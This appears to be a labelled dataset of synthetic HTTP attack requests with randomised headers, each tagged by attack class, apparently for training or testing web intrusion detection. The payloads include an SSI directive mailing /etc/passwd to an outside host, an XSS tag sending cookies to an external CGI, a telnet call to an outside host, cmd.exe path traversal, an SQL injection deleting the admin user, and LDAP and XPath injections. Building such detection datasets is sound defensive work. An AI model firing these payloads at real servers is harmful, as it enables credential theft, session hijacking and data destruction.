GET /hkaeoceeth9eyuLoile/z@z/tln/ponhOLaG/mnaiypaZn/imaa/h0Wm/bcb9vsyteuoiodo/hsaxXf/hp4fSG@dSICH7CTM@o.htm?wIvkjRi6eo=argsistr5tstcahe&rat=oteuymtmmeiyi6tI&eyts2tnnsd=%5C%22++++%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.ildelill.com+++9319++++%3B&ct=s4we+rha&iaxoD=ys&4IDformt=re629K0Vy&te6=887566438 HTTP/1.1
Host: 202.21.246.194:80
Connection: keep-alive
Accept: audio/basic, application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.4
Accept-Language: *
Cache-Control: Ura='renp'
Client-ip: 215.243.66.219
Cookie: sD7cnl=k;ArclzwcDaLalox=06207701;ip4=7sa;wM0i=tlnu8u;AJHG=08vrex;ncCunrlawaDy2ir=nn6
Cookie2: $Version="08"
Date: Mon, 15 Nov 04 04:09:22 CET
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: Yoa0tsa@jins6srL.st
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Mon, 19 Apr 10 16:03:18 GMT
If-Match: "CVP4F9VGe_r1pmKKfDX"
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: Sun, 28 Sep 08 14:04:53 CET
Max-Forwards: 36
MIME-Version: 1.3
Pragma: y0='cweniatr'
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: 2tiuo7 mksbe=Ue6Fot
Range: -696,54746-
Referer: /sRaenc/ieahijdN/eees0h/ite0rs.exe
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.6 (compatible; Konqueror/8.4; SunOS sun4u; nomnrsi)
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: winz/5.3 128.15.93.88
Transfer-Encoding: compress
Upgrade: taos/1.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36800
Start - Id: 48925
class: XPathInjection
GET /7iWipMT2dvhB/aCUfUcopy@includev94/ThHIHx/inputKXak/3hS1cE/Olni6a/cVTrQIdC3NRiW0.O.mdb?isimyqiqss=AnTlpal%27+++++or++++6+++++%3C+++++count%28path%2Fchild%3A%3A*%29+++++or++%27u9ifmn%27+%3D++++%27&tc1afo5csst5=lk4vGw&G6ItQ@yk.Kdelete=n&n6l=l5l&et8dvnieleTy=eed1Hiopab&saih8stt=oMiOJ9vA&8c5wehee75dtqz=%26rt&LZreplace1Ix-yqc=aatrerolpaoe1&hli=958&ssnnss=fi%5DXweflbhmnxp_%5CE&fte=6208&esnezvnv=rLalintlen HTTP/1.1
Host: 122.164.156.229:80
Connection: lcsmm
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 215.230.101.177
Cookie: N1n@Ve=6482081;tf5wd=ouwsvo
Cookie2: $Version="7"
Date: Mon, 08 Jan 07 15:41:06 UTC
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "AtDXj-Bjn46i1RJyMG"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 8
MIME-Version: 7.0
Pragma: egtel='awitr'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: http://laeor.net/sipd.cgi
TE: gzip
Trailer: Host
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 8.1; ch-hb; rv:3.4.2) Gecko/42153591
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: 0.5 www.eiWt9ls.css:1, 6.0 www.aset.css:7, FTP/3.4 135.56.67.62
Transfer-Encoding: identity
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 4208976972
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48925
Start - Id: 39197
class: SSI
POST /abuofnvE/sD2eoebqnts/dDrzZxLsystem31Brqic/kc0ekt8ahdOvrEnp/rbA9UK5V6GPz7Q/e52arvdyT/ttiWbinsiTy/hcyDmryaYetms4/eQbfG8GTjXdIj/slppL2HZ/ftpy/AimnriNe.png? HTTP/1.1
Content-Length: 456
Content-Language: wa
Content-Encoding: identity
Content-Location: /ln9f/utoeoast/oteo4xrs/dCeeesn.jpg
Content-MD5: dHdFbHZkaWNzbWVocm1DZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Mar 10 03:23:05 GMT
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: www.iThm6t.fr
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: idUo='oae'
Client-ip: 215.91.4.112
Cookie: wodTt1saomh=85;l34o3md9=5;nOisvees=634878800;remd2uev=2porcdbie1qE;rs=040
Cookie2: $Version="690"
Date: Sun, 31 Dec 06 24:23:22 CET
ETag: "8wubKIW_XpgAcflcCbqZ"
Expect: IetuMo8=urxni
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Tue, 06 Dec 05 11:19:41 UTC
If-Match: "ll@iozLd73iy4MuJY_"
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 01
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: -6444
Referer: http://Tofe63f.cz/lvIyr4Hy/6eApiWb/eubNii.php
TE: chunked;q=0.9
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.8 (X11; U; Open BSD i386 9.4; n8-Na; rv:4.0.2) Gecko/09516456
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: 0.1 135.158.166.236, 9.1 www.adoexy.shtml
Transfer-Encoding: identity
Upgrade: Ts8r/8.4, gal/2.5, ttgsuo/4.3, TobE/9.5
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmsbepirodxc0hO=6398&.LDapbo-GGwc=)s cetsmB&Nceemphe=tJJy_8y_.7Ao&Wzu6FgIp9SS=<!--#email fromhost="www.tStpoor.com" tohost="mailbox.eat4S.com" message="eieb y1hhese gtO4 efntAu" fromaddress="yEen.com" toaddress="e6olm.6bh.com" subject="r" sender="h6h.com" replyto="8s5Ei.com" cc="Ur7s" inreplyto="xptb1 eAvx zs" id="lRmail" -->&batwUd=t4tttlr&uTeeIemo62ex=3424274&ley9cEh8sahn4=36

End - Id: 39197
Start - Id: 47799
class: XSS
GET /nHvQ@CDsEl8c/e3sAu/PZ/x23vDgP3wyIQDQD./tkFuh/29rcatL/nlibJV0Ci4/tV/yc/d5x_DrrGDF/to.gif?httpu6n=m7orstyled7tuHii4+7dusrhh&6ce8e9=eyIbr8arpneeyee&je0t78=n%40J5GarzF&sm=iNiaexec&2ownIzeMl=ailAr&Iofbocm=528&amohdfrweNst=tdonei%27&jteiugueUeo=%3Cimg+dynsrc++%3D%22+++javascript%3A++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.dech.com%2Fcgi-bin%2Fvellat.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&raiutnnnda=98188&e8remees=aEvdocumentzh&d1ihtheeta44eef=ieoethhtoEal&mk=%5Bkjd&i8teiolays=e9tId2nrinlPlpo7&andZ0wp-=oxml0sknr&iua2er=9575 HTTP/1.1
Host: www.iOhmhcb.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 19.80.216.59
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="437"
Date: Sun, 17 Feb 08 04:36:51 UTC
ETag: W/"jgC-8NRikg5ooYRuYC"
Expect: mihtnn
From: abl8eEs@dtibtid.ch
If-Modified-Since: Sun, 22 Apr 07 20:29:24 GMT
If-Unmodified-Since: Thu, 16 Aug 07 21:31:50 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Feb 09 04:56:13 UTC
Max-Forwards: 5279
MIME-Version: 8.3
Pragma: sscO=tjanyfFo
Proxy-Authorization: Digest username="oaid"
Authorization: Digest username="eoith"
Range: 944229-6,250-
Referer: /04Naeao.php
TE: trailers,gzip;q=0.7,chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 8.2; A3-qo; rv:2.2.3) Gecko/54074970
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: 6.4 178.185.206.62, 5.3 www.hse1au.css:21, 4.1 www.lZysch.gif
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47799
Start - Id: 37571
class: LdapInjection
POST /5zKrcp1R2/ttrssNeiaurwetdea/teiiotrAniDu/av2Jx_xz/5nwgntieusdrrtr/x86V.exe? HTTP/1.1
Content-Length: 118
Content-Language: a69
Content-Encoding: identity
Content-Location: /nnulx/mLui/scytAae/3jtoitsi/auae.nsf
Content-MD5: Rmhkb3NzRGx3NmVzc0VOMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 04 06:54:28 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.aapVlw2.uk
Connection: close
Accept: application/*, application/x-tar, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lspntRy-ey, f-e6e4Sh, ea-cpc7ara, nc0bph9-qR;q=0.4, saoeid-sAzp3ns
Cache-Control: agri8E='rsaerbzL'
Client-ip: 6.255.1.122
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Mon, 06 Feb 06 06:39:24 CET
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: s7hcLn
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Mar 05 05:31:21 GMT
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Tue, 26 Jul 05 05:33:33 UTC
Max-Forwards: 0738
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: NTLM MWVzcjZGb2VyZXRlZXdyb3RJdHRldGlya0V0bEpnNGUxbGFzdA==
Authorization: Basic YndhdmZiOjV5d2lr
Range: 36-,-7
Referer: /hewjA/sqkamh.sh
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: nniocacSlkiaNjsto
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

geobsge=eoEs&9dSRu=62735717&hDthte=37)(&(objectClass=hSpi)(|(sn   = ezhw)(cn=vBt    J*))

End - Id: 37571
Start - Id: 49154
class: XPathInjection
GET /slWnZ5KjQUsfnQAGZ/h@lLAmoW/pze8/gRZHjUO.s3YmAkg/rWp55NytdoJEL.swf?ha=ti%3Cr-ae6%26a&.i-linksZ=xt&inlcamdbcm=683&oPobl=fu+systyles&uyeipsrntst2ykS=cB7V&auhey=awed&@iframePn=oll8cy2%27+++or++6++++%3C++count%28path%2Fchild%3A%3A*%29+or+%27uf%27++%3D+++%27 HTTP/1.0
Host: 11.225.163.29
Connection: keep-alive
Accept: application/*, application/*, application/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: max-age=12101
Client-ip: 16.167.236.167
Cookie: hMo3aaro1=9840;uaS=ecmnEjna
Cookie2: $Version="3"
Date: Mon, 29 Aug 05 19:25:49 CET
ETag: "HjF@45Djy@lcchXqG"
Expect: o7fw=egoae
From: esgt1xrh@tidc.com
If-Modified-Since: Wed, 23 Mar 05 22:12:40 UTC
If-Unmodified-Since: Sun, 15 Mar 09 10:25:31 CET
If-Match: *
If-None-Match: "Mazg8XbKL3VIELWPOlY5"
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 3
MIME-Version: 4.0
Pragma: xvt='i'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: woeb tyitxgi=npaonat
Range: 4916-
Referer: http://www.wsyptm.com/icou.nsf
TE: trailers
Trailer: Pragma
User-Agent: nafisstsIkhqenhoqd
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 9.8 www.ilhtnqh.htm, josbee/4.8 224.138.98.121:343, 9Vm/1.4 97.33.5.245
Transfer-Encoding: gzip
Upgrade: yfI/3.6
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49154
Start - Id: 43884
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.Pmsoidiehf.cz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: yeweaw-Chpici, n-otppra;q=0.1, e-npWahaB;q=0.6
Cache-Control: no-cache
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="62"
Date: Thu, 10 Jul 08 01:31:37 UTC
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "U4SgVWXsZnIx1_v5"
If-None-Match: "KApH@f0M_krvScD44c"
If-Range: "sEmGKjYhKUj0AqLv08J"
Max-Forwards: 6
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Digest opaque="e9nwrP8"
Range: 40517-,9-9675
Referer: /yjnsy/ehear.pl
TE: chunked;q=0.4,trailers
Trailer: If-Match
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.6; xa-vm; rv:8.3.3) Gecko/73924685
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 349x5070
Via: 6.1 176.155.150.83, FTP/6.3 97.182.50.39
Transfer-Encoding: compress
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43884
Start - Id: 49345
class: XPathInjection
GET /j3nmSuea/Wechoe8-/i7Q@AOWLjNpV@CB0@0j6/rzWwpRu/2miet/pBvrqD/8a8aepvrjyriD/feqiqrqRp7ioo42da.htm?7s=r10vtiwoeOshnXvl&ra=hclFg%27%5D+++++%7C+++P++%7C+++%2F%2Fuser%5B++++name%2Ftext%28++%29++%3D+%27unfen&hkU4VUtmp=yellowgetej&etclaew8=fejpnyank1oeiOe HTTP/1.0
Host: 7.237.74.80:80
Connection: ceiI
Accept: */*;q=0.1
Accept-Charset: iso-8859-4;q=0.0, x-mac-arabic;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: 2r02l-fe;q=0.0, i-enMh;q=0.7, mtnmrk-oeNnPju, de-mgDl;q=0.1
Cache-Control: no-transform
Client-ip: 144.73.134.163
Cookie: aRoahifymyIBer=642922667
Cookie2: $Version="415"
Date: Thu, 05 Feb 09 14:29:01 UTC
ETag: W/"5SJ1rsuHDeMmiBuju"
Expect: oitbte
From: tbcbeeti@dlnmnmt.be
If-Modified-Since: Fri, 13 Feb 04 15:52:28 UTC
If-Unmodified-Since: Tue, 10 Feb 04 22:25:29 GMT
If-Match: "epaBLMRE1Y4GzxZKArzw"
If-None-Match: *
If-Range: Fri, 08 Jul 05 04:15:41 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: e=re
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic MmkxM0M6MXJiZQ==
Range: 50519-,-46393
Referer: http://www.8enEsE.cz/ylpea/mkO4rNna/tns4dg/tsherwe.php
TE: deflate,gzip
Trailer: Upgrade
User-Agent: en5YrbkY http://www.ghmn.de
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 953x2070
Via: 5.3 19.231.4.126, 3.3 www.i7nT.gif, FTP/7.5 78.28.53.167
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 5083786
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49345
Start - Id: 37287
class: LdapInjection
POST /ozhj9dIGDLC/7fKeersthynaninc/einayqhSipeek/haieuety/np7WQk/oeTewem8td/tXK/litthnni9gt7seerhi/7obtmuefcnKroysd/kx1o7fITf1positionL1/dt/tbHELGD@zEJ.aspx? HTTP/1.0
Content-Length: 186
Content-Language: smIlc9ns,idiD
Content-Encoding: compress
Content-Location: http://www.tlodcpi.fr/ennennea/w5bttso.aspx
Content-MD5: MmlkaWlTNG14aDA2dHNkaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 09 21:19:03 CET
Host: 245.215.116.91:80
Connection: keep-alive
Accept: image/gif;q=0.6, application/*, video/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: tenhme8-Z4;q=0.6, gd-hrsaqe
Cache-Control: max-stale=6114
Cookie: J_fZxiexY8=32575269;mgeoDo=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="215"
Date: Sun, 05 Oct 08 10:16:06 UTC
ETag: "GqihKAZwpqxucDqw52"
From: UfphLeah@4nEt.uk
If-Modified-Since: Fri, 15 Feb 08 01:53:00 UTC
If-Unmodified-Since: Sat, 14 Oct 06 11:23:00 GMT
If-Match: "PGwDqrvA89L36NH"
If-None-Match: *
If-Range: Fri, 24 Jun 05 11:11:42 CET
Max-Forwards: 5172
Pragma: wt=kr
Proxy-Authorization: Digest username="txeEac"
Authorization: Digest algorithm=MD5-sess
Referer: /yOSnhhld/g8ssso.wmn
Trailer: Expect
User-Agent: Mozilla/2.9 (compatible; Konqueror/3.2; Open BSD i386; ncfrauu)
UA-CPU: Sparc
UA-Pixels: 3751x161
Via: HTTP/7.2 16.212.1.32, 6.7 55.132.147.117, smo/4.0 www.miro.css:09
Transfer-Encoding: identity
Upgrade: hcbmpk/2.2, 6hrt/8.0, 9ynIoj/7.6, see/0.7, 8ere/1.7
X-Forwarded-For: 229.176.95.66
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wuc3aeua4n8=re &entcyr0aeis=290301&rilere=6&group by5EaP3nLVwR=iataoj2anezw&glnahvNiz5pkgsa=58870&Trv3hbe=ns8ecszO&ushj8ugo2a9=s&it2oseth=spbP&bDwnje6p=Earceao5t&n5wntRid=esry&ldSrsnuP=a

End - Id: 37287
Start - Id: 40228
class: SSI
POST /i4s/rb7ZinsertMe/lg5bWBE.hCgM-GKcf/upsbxE/iYMnFbZmE8g/khDQGyGhz/xsj.vFy.html? HTTP/1.0
Content-Length: 174
Content-Language: lMemamse,jYoi8tS,mumu
Content-Encoding: identity
Content-Location: /heemho/nHin6od.nsf
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 02:32:56 UTC
Last-Modified: Sat, 16 Sep 06 05:23:28 UTC
Host: 52.206.51.191:68
Connection: keep-alive
Accept-Charset: iso-8859-8-i;q=0.4, windows-1255, koi8;q=0.0
Accept-Language: b-Nu1l, aeds9ei-h, annold-g, we-e3codion, hnin-nsIs
Cache-Control: only-if-cached
Cookie: afEintcrt=nihT;ie=38210;LtsuAsk3am=ncsystemptayrIEn<;em31rozalHvhoae=<!--     #exec cmd="/bin/mail  hufp.com     < /etc/passwd"-->;ce=7
Date: Thu, 24 Jun 04 08:27:43 CET
If-Modified-Since: Fri, 28 Mar 08 20:34:02 CET
If-Match: *
If-None-Match: "5xQlHirTsW_8D4MXEa"
Referer: /rtaeofe.bin
TE: trailers,trailers
User-Agent: DBiuirsi/3.8
Transfer-Encoding: identity

7accepttVbG616e=3867&tpgssm=mgotS&nepenoltr=$10d&oa5meesR=<iBdiTsB:ce&SWh=033&tkrvLEin=736&etijeiAaeh=adW&tinsaaa6=9tfqtn oad[&l2GgsS=664989&TVe1zoeNvz=pnsu0So+'c

End - Id: 40228
Start - Id: 38445
class: LdapInjection
GET /ti5rz/oahderEDylsrj/dV97LWCrtkhRz11vCKi/oLG4AfDhHZKJjW/desnkHh.dll?bltelnetls=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&tseiiRsiAo3c=Yesdkstetefne HTTP/1.0
Host: 220.91.110.35
Connection: domml
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: aiAEnn5-etldouQL, ieErdup-L3a3a;q=0.6
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: c2id=2i1oa
Cookie2: $Version="6"
Date: Sun, 05 Jun 05 06:27:14 GMT
ETag: "52QEXR1m9EuiAh57g@7I"
Expect: 100-continue
From: rrdhloR@le2p.gov
If-Modified-Since: Sun, 11 Dec 05 09:46:08 CET
If-Unmodified-Since: Thu, 04 May 06 12:44:12 GMT
If-Match: "2ZPsCpvbwsDSLrsV"
If-None-Match: *
If-Range: "bGvh7y0uzwm5qZ8HAJC"
Max-Forwards: 225
MIME-Version: 3.3
Pragma: ad2AaS4=9pc3ne
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest cnonce="ohrEir"
Range: 86309-
Referer: /nl2o.cgi
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/7.3 (X11; U; Solaris 6.1; 7s-ur; rv:7.2.2) Gecko/01675942
UA-CPU: 68000
UA-Disp: 945,9874,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38445
Start - Id: 40245
class: SSI
POST /yt7pdbool.msf? HTTP/1.0
Content-Length: 263
Content-Language: w4iaena
Content-Encoding: gzip
Content-Location: http://9owia.de/szrf/de2roi/bgh9oaae.php3
Content-MD5: aG9MejFhZWF0aG1uaWRvMg==
Content-Type: application/x-www-form-urlencoded
Host: 163.162.43.228
Connection: close
Accept: text/plain, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mmean-odsnasi
Cache-Control: no-cache
If-Unmodified-Since: Tue, 18 Nov 08 24:39:18 GMT
If-Match: "v9nwMmwe_fsNSyEn"
If-Range: Tue, 15 Mar 05 08:03:16 GMT
Max-Forwards: 655
Pragma: no-cache
Referer: http://Nafd3pnp.st/rui1s/dialrhE/Kniddgd/iamd/aIiqii.jpeg
User-Agent: Mozilla/9.2 (Windows; U; Win 9x 4.7; lX-Sz; rv:2.8.4) Gecko/33115765
Via: 4n2asi/6.8 www.nhulbst.jpeg, 5.8 211.48.191.132, 4.4 30.51.112.119

cdfLasqY5ie=<!-- #exec     cmd="c:\progra~1\IMhei\hi0iIhe\0amUt.exe   d:\nniP\www.esic.org\snOeEhryE\database.mdb   /x   exporttofoxpro"-->&Astyie8sp=oerm62m&tgox=dhCwtrfldes&3nrdtihf9=743&ewi4MasnhdeI=nO1kTtv&1akssmA2ht=ftaa

End - Id: 40245
Start - Id: 41308
class: SqlInjection
GET /ctrDcrd9na6cut/nyta/eznmLjwE.gif?ad0xtr1rg=qa&91tzOh=rr&nSngnt5=eqRMqoBI&dwseexrRehdeij=+&uai5a7ftokt9s=537808&xSeniBf9=521&nw=ke5Vdbarir&sssaRar=98482955&cdpe=repftpo&oksupyr3ua=nss&ylluesmlihYes=i%25esEwkez7no3taAeyto HTTP/1.0
Host: 3.151.83.120
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.3, x-mac-cyrillic;q=0.0, ks_c_5601-1987;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=3872
Client-ip: 240.155.203.208
Cookie: Itaolii=7914;tpoaeioqtw=thopthttpsweandBmrr$ue7  ;n8t3ccon7ahoe4=tifhndI3e' );DELETEFROMusersWHEREupper(username)    =  upper(    'admin
Expect: mhoc
If-Modified-Since: Sat, 04 Apr 09 23:52:35 GMT
If-Unmodified-Since: Mon, 16 Feb 04 11:36:15 CET
If-Match: "phNdOK6XvC.xxXVAXY"
If-Range: "KQ@Y-p@mjk1oI.GiPypN"
Max-Forwards: 72
MIME-Version: 0.9
Proxy-Authorization: Basic eGRlb246cTRzYg==
Referer: http://www.stylty.be/oKtD/oyiqon6.jpg
User-Agent: Mozilla/4.0 (X11; U; Linux i386 6.3; bo-uz; rv:7.7.2) Gecko/55970239
UA-Color: color16
Via: 0.2 www.tdie.jpeg, FTP/0.3 www.eoEeaxp.js, HTTP/7.7 www.ka7t.html
Transfer-Encoding: 9Y1b
Upgrade: Nxt/5.4, oewn/2.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41308
Start - Id: 39695
class: SSI
GET /i9i7MUqcV_W/aQXHmW0bdtixcfU4Dt.z/CTjNrHugroup bywsIf/eXqs_.fjlvQVnhCTa6/eVRqgfgLo3W1k.WPp.pl?ate9mfpnesD=la%5De0%3A&wApfa=1627&rbl9e3rf=th2r&C9slyd=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&cZB.jl@EP_az=passwdr+&hzrvnlta=616&gi=4&Mp1otlDBv=8685999&XeQk-g=5221328870 HTTP/1.1
Host: 202.167.77.132:73560
Connection: mG7mnr
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i;q=0.6, windows-1258, iso-8859-15, iso-2022-kr;q=0.2, iso-8859-4
Accept-Encoding: deflate;q=0.6, deflate;q=0.4, identity;q=0.7, compress;q=0.8, gzip;q=0.8
Accept-Language: *;q=0.0
Cache-Control: an5j=nn
Client-ip: 179.111.181.116
Cookie: d2eqar1=oidernc;agTnuOe=psh9i;sra9ke5=bK7ZIo;edaort=nLahZMcYNYd7;ieegRrlD1dasMau=tY-.METMCSl;reedyr7oeoibo5=I/ehm
Cookie2: $Version="38"
Date: Sat, 22 May 04 11:23:40 UTC
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Wed, 11 Feb 09 18:30:43 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Mar 08 24:30:32 GMT
Max-Forwards: 5021
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: http://morek.be/hkshntq/nrh3Msqc/lr7sei/t2no.doc
TE: gzip;q=0.7,deflate;q=0.3
Trailer: Referer
User-Agent: e363nMMFT http://www.dcrtlk.st
UA-CPU: Sparc
